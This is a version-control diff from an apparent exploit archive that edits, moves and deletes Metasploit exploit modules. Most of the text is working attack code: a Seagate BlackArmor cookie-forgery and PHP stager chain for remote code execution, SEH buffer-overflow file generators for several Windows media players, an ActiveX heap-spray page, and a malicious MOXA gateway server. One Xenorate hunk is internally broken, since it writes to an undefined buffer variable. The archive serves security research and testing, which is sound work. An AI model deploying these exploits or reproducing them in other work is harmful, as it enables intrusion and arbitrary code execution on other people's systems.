administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
@ -27,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Version' => '$Revision: 10617 $',
'References' =>
[
[ 'CVE', '2004-1389' ],
@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
'Targets' =>
[
['Automatic', { }],
],
@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
sock.put(buf)
res = sock.get(-1,3)
print_status("#{res}")
handler

51
platforms/php/remote/36264.rb
View file

@ -6,7 +6,7 @@
require 'msf/core'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
@ -22,7 +22,6 @@ class Metasploit4 < Msf::Exploit::Remote
without the need for authentication. The cookie can be easily decrypted using a
known static encryption key and re-encrypted once the PHP object string has been
modified.
This module has been tested on the STBN300 device.
},
'Author' => [
@ -87,7 +86,7 @@ class Metasploit4 < Msf::Exploit::Remote
headers = res.to_s
# validate headers
if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
# and make sure that the body contains the title we'd expect
if res.body.include?('Login to BlackArmor')
return Exploit::CheckCode::Appears
@ -109,7 +108,7 @@ class Metasploit4 < Msf::Exploit::Remote
# Step 1 - Establish a session with the target which will give us a PHP object we can
# work with.
begin
print_status("#{peer} - Establishing session with target ...")
print_status("Establishing session with target ...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
'method' => 'GET',
@ -121,21 +120,21 @@ class Metasploit4 < Msf::Exploit::Remote
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
cookie_value = $1.strip
else
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
# then update it so that it's an admin session before re-encrypting
print_status("#{peer} - Upgrading session to administrator ...")
print_status("Upgrading session to administrator ...")
php_object = decode_cookie(cookie_value)
vprint_status("#{peer} - PHP Object: #{php_object}")
vprint_status("PHP Object: #{php_object}")
admin_php_object = set_string(php_object, 'is_admin', 'yes')
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
vprint_status("#{peer} - Admin PHP object: #{admin_php_object}")
vprint_status("Admin PHP object: #{admin_php_object}")
admin_cookie_value = encode_cookie(admin_php_object)
@ -146,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote
config_time = ::Time.now.to_i
begin
print_status("#{peer} - Extracting existing host configuration ...")
print_status("Extracting existing host configuration ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
'method' => 'GET',
@ -167,14 +166,14 @@ class Metasploit4 < Msf::Exploit::Remote
end
end
else
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
end
print_good("#{peer} - Host configuration extracted.")
vprint_status("#{peer} - Host configuration: #{host_config}")
print_good("Host configuration extracted.")
vprint_status("Host configuration: #{host_config}")
# Step 4 - replace the host device description with a custom payload that can
# be used for LFI. We have to keep the payload small because of size limitations
@ -191,7 +190,7 @@ class Metasploit4 < Msf::Exploit::Remote
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
stager = Rex::Text.encode_base64(installer)
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
vprint_status("#{peer} - Stager: #{stager}")
vprint_status("Stager: #{stager}")
# Butcher the XML directly rather than attempting to use REXML. The target XML
# parser is way to simple/flaky to deal with the proper stuff that REXML
@ -203,7 +202,7 @@ class Metasploit4 < Msf::Exploit::Remote
vprint_status(xml_payload)
# Step 5 - set the host description to the stager so that it is written to disk
print_status("#{peer} - Uploading stager ...")
print_status("Uploading stager ...")
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
@ -221,16 +220,16 @@ class Metasploit4 < Msf::Exploit::Remote
)
unless res && res.code == 200
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
end
print_good("#{peer} - Stager uploaded.")
print_good("Stager uploaded.")
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
print_status("#{peer} - Executing stager ...")
print_status("Executing stager ...")
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
payload_cookie_value = encode_cookie(payload_php_object)
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
@ -250,20 +249,20 @@ class Metasploit4 < Msf::Exploit::Remote
)
if res && res.code == 200
print_good("#{peer} - Stager execution succeeded, payload ready for execution.")
print_good("Stager execution succeeded, payload ready for execution.")
else
print_error("#{peer} - Stager execution failed (invalid result).")
print_error("Stager execution failed (invalid result).")
errored = true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
print_error("#{peer} - Stager execution failed (unable to establish connection).")
print_error("Stager execution failed (unable to establish connection).")
errored = true
end
# Step 7 - try to restore the previous configuration, allowing exceptions
# to bubble up given that we're at the end. This step is important because
# we don't want to leave a trail of junk on disk at the end.
print_status("#{peer} - Restoring host config ...")
print_status("Restoring host config ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
'method' => 'POST',
@ -281,7 +280,7 @@ class Metasploit4 < Msf::Exploit::Remote
# Step 8 - invoke the installed payload, but only if all went to plan.
unless errored
print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
res = send_request_cgi(
'uri' => normalize_uri(target_uri, payload_file),
'method' => 'GET',
@ -325,7 +324,7 @@ class Metasploit4 < Msf::Exploit::Remote
cookie_value = xor(block, datastore['XORKEY'])
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
vprint_status("#{peer} - Cookie value: #{cookie_value}")
vprint_status("Cookie value: #{cookie_value}")
cookie_value
end

0
platforms/windows/local/35935.py → platforms/windows/dos/35935.py
View file

0
platforms/windows/local/36841.py → platforms/windows/dos/36841.py
View file

0
platforms/windows/remote/9139.pl → platforms/windows/dos/9139.pl
View file

0
platforms/windows/local/9364.py → platforms/windows/dos/9364.py
View file

43
platforms/windows/local/10363.rb
View file

@ -1,3 +1,14 @@
##
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@ -5,27 +16,30 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
When opening a malicious pls file with the Audio Workstation,
a remote attacker could overflow a buffer and execute
arbitrary code.
When opening a malicious pls file with the Audio Workstation,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'germaya_x', 'dookie', ],
'Version' => '$Revision: 7724 $',
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0476' ],
[ 'OSVDB', '55424' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 4100,
@ -35,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
],
@ -43,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Dec 08 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'evil.pls']),
], self.class)
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
], self.class)
end
@ -59,12 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << payload.encoded
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
pls = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
file_create(pls)
end
end
end

63
platforms/windows/local/10373.rb
View file

@ -1,73 +1,80 @@
##
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)',
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack overflow in Xenorate 2.50
By creating a specially crafted xpl playlist file, an an attacker may be able
to execute arbitrary code.
This module exploits a stack buffer overflow in Xenorate 2.50
By creating a specially crafted xpl file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'loneferret, original by germaya_x' ],
'Version' => '$Revision: $',
'Author' =>
[
'hack4love <hack4love [at] hotmail.com>',
'germaya_x',
'loneferret',
'jduck'
],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'OSVDB', '57162' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 5100,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
],
'Privileged' => false,
'DisclosureDate' => 'Dec 10 2009',
'DisclosureDate' => 'Aug 19 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'evil.xpl']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
], self.class)
end
def exploit
# Unleash the Egghunter!
eh_stub, eh_egg = generate_egghunter
sploit = rand_text_alpha_upper(88)
sploit << "\xEB\x06\x90\x90"
sploit << [target.ret].pack('V')
sploit << make_nops(20)
buffer << eh_stub
buffer << rand_text_alpha_upper(2000)
buffer << eh_egg * 2
sploit << generate_seh_payload(target.ret)
sploit << payload.encoded
xpl = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(xpl)
file_create(sploit)
end

30
platforms/windows/local/10744.rb
View file

@ -1,3 +1,7 @@
##
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -11,31 +15,32 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
'Description' => %q{
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ron Henry - <rlh [at] ciphermonk.net>',
'Ron Henry <rlh[at]ciphermonk.net>',
'dijital1',
],
'Version' => '$Revision: 7828 $',
'Version' => '$Revision: 11516 $',
'References' =>
[
[ 'OSVDB', '' ],
[ 'URL', 'http://www.exploit-db.com' ],
[ 'OSVDB', '55924' ],
[ 'CVE', '2009-2650']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
],
'Privileged' => false,
'DisclosureDate' => 'July 1 2009',
'DefaultTarget' => 0))
register_options(
@ -60,15 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
sploit << rand_text_alphanumeric(262)
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
sploit << rand_text_alphanumeric(262)
sploit << generate_seh_payload(target.ret)
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

29
platforms/windows/local/10748.rb
View file

@ -1,3 +1,7 @@
##
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -15,27 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an an attacker may be able
to execute arbitrary code.
'Description' => %q{
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Corlan Security Team ',
'Ron Henry - <rlh [at] ciphermonk.net> - EIP Offset fix',
'CORELAN Security Team ',
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
'dijital1',
],
'Version' => '$Revision: 7828 $',
'Version' => '$Revision: 11516 $',
'References' =>
[
[ 'OSVDB', '' ],
[ 'OSVDB', '61341' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 25 2009',
'DefaultTarget' => 0))
register_options(
@ -60,16 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
sploit = rand_text_alphanumeric(17403)
sploit = rand_text_alphanumeric(17403)
sploit << [target.ret].pack('V')
sploit << "CAFE" * 8
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
print_status("Copy .pls to webserver and pass the URL to the application")
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
end
end

78
platforms/windows/local/16620.rb
View file

@ -1,78 +0,0 @@
##
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
By creating a specially crafted m3u or pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ron Henry <rlh[at]ciphermonk.net>',
'dijital1',
],
'Version' => '$Revision: 11516 $',
'References' =>
[
[ 'OSVDB', '55924' ],
[ 'CVE', '2009-2650']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 3000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
],
'Privileged' => false,
'DisclosureDate' => 'July 1 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
], self.class)
end
def exploit
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
sploit << rand_text_alphanumeric(262)
sploit << generate_seh_payload(target.ret)
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

81
platforms/windows/local/16650.rb
View file

@ -1,81 +0,0 @@
##
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
'Description' => %q{
This module exploits a stack buffer overflow in Xenorate 2.50
By creating a specially crafted xpl file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hack4love <hack4love [at] hotmail.com>',
'germaya_x',
'loneferret',
'jduck'
],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'OSVDB', '57162' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 5100,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
],
'Privileged' => false,
'DisclosureDate' => 'Aug 19 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(88)
sploit << generate_seh_payload(target.ret)
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

81
platforms/windows/local/16661.rb
View file

@ -1,81 +0,0 @@
##
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
When opening a malicious pls file with the Audio Workstation,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'germaya_x', 'dookie', ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0476' ],
[ 'OSVDB', '55424' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 4100,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 08 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(1308)
sploit << "\xeb\x16\x90\x90"
sploit << [target.ret].pack('V')
sploit << make_nops(32)
sploit << payload.encoded
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end

80
platforms/windows/local/16676.rb
View file

@ -1,80 +0,0 @@
##
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CORELAN Security Team ',
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
'dijital1',
],
'Version' => '$Revision: 11516 $',
'References' =>
[
[ 'OSVDB', '61341' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 3500,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 25 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
], self.class)
end
def exploit
sploit = rand_text_alphanumeric(17403)
sploit << [target.ret].pack('V')
sploit << "CAFE" * 8
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
end
end

102
platforms/windows/local/41705.rb
View file

@ -1,102 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
],
'DisclosureDate' => 'Oct 19 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
<script language ="javascript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.PlayFileName = #{rand8};
</script>
</html>
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
end
end

76
platforms/windows/local/41713.rb
View file

@ -1,76 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'Ruben Santamarta', 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
],
'Privileged' => false,
'DisclosureDate' => 'Oct 20 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
sploit = rand_text_alpha_upper(18024)
sploit[0, 4] = [0x29001028].pack('V')
sploit[472, payload.encoded.length] = payload.encoded
sploit[1072, 8] = generate_seh_record(target.ret)
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
client.put(sploit)
handler(client)
service.close_client(client)
end
end

184
platforms/windows/remote/1151.pm
View file

@ -1,131 +1,83 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
